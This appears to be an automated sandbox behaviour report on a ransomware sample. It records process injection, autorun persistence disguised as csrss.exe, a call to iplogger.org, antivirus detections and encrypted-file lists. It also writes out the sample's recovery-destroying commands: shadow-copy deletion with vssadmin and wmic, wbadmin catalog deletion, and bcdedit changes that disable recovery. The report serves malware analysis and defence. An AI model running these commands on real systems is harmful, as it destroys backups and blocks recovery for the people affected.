NtProtectVirtualMemory Sept. 1, 2021, 9:39 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72811000 process_handle: 0xffffffff	1

Looks up the external IP address (1 event)

domain

geoiptool.com

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~temp001.bat

Creates a suspicious process (7 events)

cmdline	"C:\Windows\system32\cmd.exe" /C C:\Users\test22\AppData\Local\Temp\~temp001.bat
cmdline	"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
cmdline	"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
cmdline	"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
cmdline	"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
cmdline	"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
cmdline	wmic shadowcopy delete

Executes one or more WMI queries (1 event)

wmi	SELECT * FROM Win32_ShadowCopy

Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Sept. 1, 2021, 9:32 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 1, 2021, 9:32 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 1, 2021, 9:39 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Sept. 1, 2021, 9:39 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
cmdline	wmic shadowcopy delete

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 1, 2021, 9:32 a.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004f8	1
NtAllocateVirtualMemory Sept. 1, 2021, 9:32 a.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00100000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004f8	1
NtAllocateVirtualMemory Sept. 1, 2021, 9:32 a.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00110000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004f8	1

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\csrss.exe

reg_value

"C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe" -start

Creates a thread using CreateRemoteThread in a non-child process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2072 created a remote thread in non-child process 492
CreateRemoteThread Sept. 1, 2021, 9:32 a.m.	thread_identifier: 2532 process_identifier: 492 function_address: 0x00110000 flags: 0 stack_size: 0 parameter: 0x00100000 process_handle: 0x000004f8	1	1480	0

Manipulates memory of a non-child process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2072 manipulating memory of non-child process 492
NtAllocateVirtualMemory Sept. 1, 2021, 9:32 a.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004f8	1	0	0
NtAllocateVirtualMemory Sept. 1, 2021, 9:32 a.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00100000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004f8	1	0	0
NtAllocateVirtualMemory Sept. 1, 2021, 9:32 a.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00110000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004f8	1	0	0

Network communications indicative of possible code injection originated from the process csrss.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetConnectA Sept. 1, 2021, 9:32 a.m.	username: service: 3 hostname: iplogger.org internet_handle: 0x00cc0004 flags: 0 password: port: 80	1	13369352	0
HttpOpenRequestA Sept. 1, 2021, 9:32 a.m.	connect_handle: 0x00cc0008 http_version: flags: 3 http_method: GET referer: path: 1L3ig7.gz	1	13369356	0

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2072 injected into non-child 492
WriteProcessMemory Sept. 1, 2021, 9:32 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\pattern.exe base_address: 0x000f0000 process_identifier: 492 process_handle: 0x000004f8	1	1	0
WriteProcessMemory Sept. 1, 2021, 9:32 a.m.	buffer: ³suzsuÿsu base_address: 0x00100000 process_identifier: 492 process_handle: 0x000004f8	1	1	0
WriteProcessMemory Sept. 1, 2021, 9:32 a.m.	buffer: UìÄðVWEð}ð¥¥¥¥hèÿUøÿuüÿUðøtíhÎúÞÿUô_^å]ÂUìÄØSVW3ÒUØUÜUàUüØ3ÀUhiÐBdÿ0d Û7Uà¸ÐBèÔ2þÿEàè\|ýÿPh¬ÐBèuýÿPèwýÿEäUÜ¸ÄÐBè«2þÿEÜèg\|ýÿPh¬ÐBèLýÿPèNýÿEèUØ¸øÐBè2þÿEØè>\|ýÿPh¬ÐBè#ýÿPè%ýÿEìUü3Àè4)þÿj@h0Eüè}ýÿÀ@PjSèÝýÿðuðEøPEüè`ýÿÀ@PEüèDýÿPVSèØýÿj@h0jjSè§ýÿðEøPjEäPVSè´ýÿ}øuHj@h0hôjSèzýÿøEøPhôh¨ÎBWSèýÿ}øôuEôPjVWjjSè8ýÿÀ3ÀZYYdhpÐBEØºèwýÿEüè~ýÿÃéoýÿëã_^[å]Ãÿÿÿÿ+ÿþücIÐÆùé®É Àz0Ç2· &ÿ¹ base_address: 0x00110000 process_identifier: 492 process_handle: 0x000004f8	1	1	0

Modifies boot configuration settings (2 events)

command	"c:\windows\system32\cmd.exe" /c bcdedit /set {default} recoveryenabled no
command	"c:\windows\system32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

Removes the Shadow Copy to avoid recovery of the system (2 events)

cmdline	vssadmin delete shadows /all /quiet
cmdline	wmic shadowcopy delete

Created a process named as a common system process (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Sept. 1, 2021, 9:32 a.m.	thread_identifier: 1204 thread_handle: 0x0000025c process_identifier: 1456 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe" -start filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000264	1	1	0
ShellExecuteExW Sept. 1, 2021, 9:32 a.m.	show_type: 1 filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe parameters: -start filepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe	1	1	0

Uses suspicious command line tools or Windows utilities (2 events)

cmdline	vssadmin delete shadows /all /quiet
cmdline	"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (21 events)

Time & API	Arguments	Status	Return
NtResumeThread Sept. 1, 2021, 9:32 a.m.	thread_handle: 0x000004e4 suspend_count: 1 process_identifier: 2072	1	0
CreateProcessInternalW Sept. 1, 2021, 9:32 a.m.	thread_identifier: 1204 thread_handle: 0x0000025c process_identifier: 1456 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe" -start filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000264	1	1
CreateProcessInternalW Sept. 1, 2021, 9:32 a.m.	thread_identifier: 1976 thread_handle: 0x000004f8 process_identifier: 492 current_directory: filepath: track: 1 command_line: notepad.exe filepath_r: stack_pivoted: 0 creation_flags: 134217796 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|IDLE_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000504	1	1
NtAllocateVirtualMemory Sept. 1, 2021, 9:32 a.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004f8	1	0
WriteProcessMemory Sept. 1, 2021, 9:32 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\pattern.exe base_address: 0x000f0000 process_identifier: 492 process_handle: 0x000004f8	1	1
NtAllocateVirtualMemory Sept. 1, 2021, 9:32 a.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00100000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004f8	1	0
WriteProcessMemory Sept. 1, 2021, 9:32 a.m.	buffer: ³suzsuÿsu base_address: 0x00100000 process_identifier: 492 process_handle: 0x000004f8	1	1
NtAllocateVirtualMemory Sept. 1, 2021, 9:32 a.m.	process_identifier: 492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00110000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004f8	1	0
WriteProcessMemory Sept. 1, 2021, 9:32 a.m.	buffer: UìÄðVWEð}ð¥¥¥¥hèÿUøÿuüÿUðøtíhÎúÞÿUô_^å]ÂUìÄØSVW3ÒUØUÜUàUüØ3ÀUhiÐBdÿ0d Û7Uà¸ÐBèÔ2þÿEàè\|ýÿPh¬ÐBèuýÿPèwýÿEäUÜ¸ÄÐBè«2þÿEÜèg\|ýÿPh¬ÐBèLýÿPèNýÿEèUØ¸øÐBè2þÿEØè>\|ýÿPh¬ÐBè#ýÿPè%ýÿEìUü3Àè4)þÿj@h0Eüè}ýÿÀ@PjSèÝýÿðuðEøPEüè`ýÿÀ@PEüèDýÿPVSèØýÿj@h0jjSè§ýÿðEøPjEäPVSè´ýÿ}øuHj@h0hôjSèzýÿøEøPhôh¨ÎBWSèýÿ}øôuEôPjVWjjSè8ýÿÀ3ÀZYYdhpÐBEØºèwýÿEüè~ýÿÃéoýÿëã_^[å]Ãÿÿÿÿ+ÿþücIÐÆùé®É Àz0Ç2· &ÿ¹ base_address: 0x00110000 process_identifier: 492 process_handle: 0x000004f8	1	1
NtResumeThread Sept. 1, 2021, 9:32 a.m.	thread_handle: 0x000002f4 suspend_count: 1 process_identifier: 1456	1	0
CreateProcessInternalW Sept. 1, 2021, 9:32 a.m.	thread_identifier: 2300 thread_handle: 0x00000544 process_identifier: 2884 current_directory: C:\Windows\system32\ filepath: track: 1 command_line: "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000054c	1	1
CreateProcessInternalW Sept. 1, 2021, 9:32 a.m.	thread_identifier: 812 thread_handle: 0x00000554 process_identifier: 2944 current_directory: C:\Windows\system32\ filepath: track: 1 command_line: "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000550	1	1
CreateProcessInternalW Sept. 1, 2021, 9:32 a.m.	thread_identifier: 1852 thread_handle: 0x0000055c process_identifier: 2312 current_directory: C:\Windows\system32\ filepath: track: 1 command_line: "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000558	1	1
CreateProcessInternalW Sept. 1, 2021, 9:32 a.m.	thread_identifier: 2972 thread_handle: 0x00000564 process_identifier: 1080 current_directory: C:\Windows\system32\ filepath: track: 1 command_line: "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000560	1	1
CreateProcessInternalW Sept. 1, 2021, 9:32 a.m.	thread_identifier: 2444 thread_handle: 0x0000056c process_identifier: 3024 current_directory: C:\Windows\system32\ filepath: track: 1 command_line: "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000568	1	1
CreateProcessInternalW Sept. 1, 2021, 9:32 a.m.	thread_identifier: 2480 thread_handle: 0x00000574 process_identifier: 2656 current_directory: C:\Windows\system32\ filepath: track: 1 command_line: "C:\Windows\system32\cmd.exe" /C C:\Users\test22\AppData\Local\Temp\~temp001.bat filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000570	1	1
CreateProcessInternalW Sept. 1, 2021, 9:32 a.m.	thread_identifier: 584 thread_handle: 0x0000057c process_identifier: 1332 current_directory: C:\Users\test22\AppData\Roaming\Microsoft\Windows\ filepath: track: 1 command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe" -agent 0 filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000578	1	1
CreateProcessInternalW Sept. 1, 2021, 9:39 a.m.	thread_identifier: 2532 thread_handle: 0x00000084 process_identifier: 1976 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\wbem\WMIC.exe track: 1 command_line: wmic shadowcopy delete filepath_r: C:\Windows\System32\Wbem\WMIC.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW Sept. 1, 2021, 9:39 a.m.	thread_identifier: 2560 thread_handle: 0x00000084 process_identifier: 2128 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\vssadmin.exe track: 1 command_line: vssadmin delete shadows /all /quiet filepath_r: C:\Windows\system32\vssadmin.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW Sept. 1, 2021, 9:39 a.m.	thread_identifier: 2888 thread_handle: 0x00000084 process_identifier: 2236 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\wbem\WMIC.exe track: 1 command_line: wmic shadowcopy delete filepath_r: C:\Windows\System32\Wbem\WMIC.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW Sept. 1, 2021, 9:39 a.m.	thread_identifier: 2524 thread_handle: 0x0000008c process_identifier: 808 current_directory: C:\Windows\system32 filepath: C:\Windows\System32\vssadmin.exe track: 1 command_line: vssadmin delete shadows /all /quiet filepath_r: C:\Windows\system32\vssadmin.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1

File has been identified by 31 AntiVirus engines on VirusTotal as malicious (31 events)

Bkav	W32.AIDetect.malware2
Elastic	malicious (high confidence)
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
Alibaba	Ransom:Win32/generic.ali2000010
CrowdStrike	win/malicious_confidence_90% (W)
Cyren	W32/FakeAlert.DX.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Generik.HMIXXKV
APEX	Malicious
Paloalto	generic.ml
Cynet	Malicious (score: 100)
Kaspersky	VHO:Trojan-Ransom.Win32.Vega.ax
Avast	FileRepMetagen [Malware]
Rising	Trojan.Kryptik!1.D62E (CLASSIC)
Comodo	TrojWare.Win32.Agent.ztvag@0
McAfee-GW-Edition	BehavesLike.Win32.Generic.gm
FireEye	Generic.mg.dcef208fcdac3345
Sophos	Mal/Generic-R + Mal/EncPk-APW
GData	Win32.Trojan-Ransom.Zeppelin.GYYT0B
Webroot	W32.Bot.Gen
Kingsoft	Win32.Heur.KVMH008.a.(kcloud)
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
McAfee	Artemis!DCEF208FCDAC
VBA32	BScope.Malware-Cryptor.MTA
Malwarebytes	Malware.AI.1126792071
SentinelOne	Static AI - Malicious PE
Fortinet	W32/Qbot.CV!tr
BitDefenderTheta	Gen:NN.ZexaF.34110.AqW@ae6GONai
AVG	FileRepMetagen [Malware]
MaxSecure	Virus.Patched.OF

Drops 11099 unknown file mime types indicative of ransomware writing encrypted files back to disk (50 out of 10996 events)

file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\personal\perso051.hwt.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\microsoft office\clipart\pub60cor\pe00272_.wmf.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\microsoft office\clipart\pub60cor\j0188667.wmf.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\clipart\m_banner\banner_15.png.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\clipart\m_letter\letter_078.png.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\clipart\m_work\work_43.png.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\common80\imgfilters\gs\gs8.60\lib\bj8hg12f.upp.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\wongo\madang.ini.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\personal\perso196.hwt.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\common80\him\hncjpn80.him.kd8eby0.1aa-c28-9d4
file	c:\program files\java\jre7\lib\zi\indian\kerguelen.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\microsoft office\office12\1042\msaccess_col.hxt.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\ki_games\kgame_24.drt.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\fonts\hcjpsegt.hft.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\arch\arch003.hwt.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\pl_birthflower\plantb_18.drt.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\microsoft office\office12\mysl.ico.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\nt_birthstone\stone_03.drt.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\kt_proverb\prove_09.drt.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\cp_common\comp2_11.drt.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\namecard\name12.hwt.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\common80\imgfilters\gs\fonts\a010015l.afm.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\bogun\bogun031.hwt.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\clipart\m_school\school_05.png.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\notebook\notebook32.hwt.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\common80\imgfilters\gs\gs8.60\lib\pdf_ops.ps.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\common80\imgfilters\gs\gs8.60\resource\cmap\uniks-utf8-v.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\religion\crist35.hwt.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\present\presen28.hwt.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\bg_picture1\bacg4_06.drt.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\microsoft office\clipart\pub60cor\bl00932_.wmf.kd8eby0.1aa-c28-9d4
file	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02091_.WMF
file	c:\program files (x86)\hnc\hwp80\hwpobject.tlb.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\clipart\m_textbox\textbox_07.jpg.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\microsoft office\clipart\pub60cor\j0382939.jpg.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\dg_decoarrows\arrod_12.drt.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\microsoft office\clipart\pub60cor\j0107290.wmf.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\clipart\ec_science\sci050.png.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\microsoft office\clipart\pub60cor\hh01058_.wmf.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\clipart\m_background\background_28.jpg.kd8eby0.1aa-c28-9d4
file	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE12\AUTOSHAP\BD18234_.WMF
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\ep_common\ballg_23.drt.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\clipart\m_decoration\decoration_33.png.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\purchase\purch099.hwt.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\hwptemplate\draw\fg_callouts\line callout4 (no border).drt.kd8eby0.1aa-c28-9d4
file	C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Draw\RG_Common\Reli1_05.drt
file	C:\Program Files (x86)\Microsoft Office\Office12\Groove\ToolData\groove.net\Calendar\GlobeButtonImage.jpg
file	c:\program files (x86)\hnc\shared80\hwptemplate\xml\kor\booksreg.xsd.kd8eby0.1aa-c28-9d4
file	c:\program files (x86)\hnc\shared80\clipart\m_work\work_37.png.kd8eby0.1aa-c28-9d4
file	C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Draw\MP_Way\RougR_37.drt

pattern.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All